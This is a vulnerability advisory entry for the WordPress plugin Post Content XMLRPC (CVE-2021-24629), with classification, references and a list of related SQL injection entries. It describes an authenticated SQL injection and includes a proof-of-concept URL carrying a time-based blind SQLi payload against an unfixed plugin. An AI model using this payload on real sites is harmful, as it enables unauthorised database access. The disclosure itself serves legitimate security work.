WordPress Plugin Vulnerabilities

Post Content XMLRPC <= 1.0 - Admin+ SQL Injections

Description

The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to an authenticated SQL Injections

Proof of Concept

https://example.com/wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1%20AND%20(SELECT%207953%20FROM%20(SELECT(SLEEP(5)))AgUn)

Affects Plugins

Plugin icon
post-content-xmlrpc
No known fix

References

CVE
CVE-2021-24629
URL
https://codevigilant.com/disclosure/2021/wp-plugin-post-content-xmlrpc/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.6 (high)

Miscellaneous

Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
fb42980c-93e5-42d5-a478-c2b348eaea67

Timeline

Publicly Published
2021-10-07 (about 2 years ago)
Added
2021-10-07 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other

Published
Title
Published
2017-11-13
Title
bbPress <= 2.5.12 - Unauthenticated SQL Injection
Published
2021-10-07
Title
Unlimited PopUps <= 4.5.3 - Author+ SQL Injection
Published
2022-05-09
Title
Realty Workstation < 1.0.15 - Agent SQLi
Published
2023-06-28
Title
Short URL < 1.6.5 - Subscriber+ SQLi
Published
2015-07-23
Title
SendPress Newsletters < 1.2 - Authenticated SQL Injection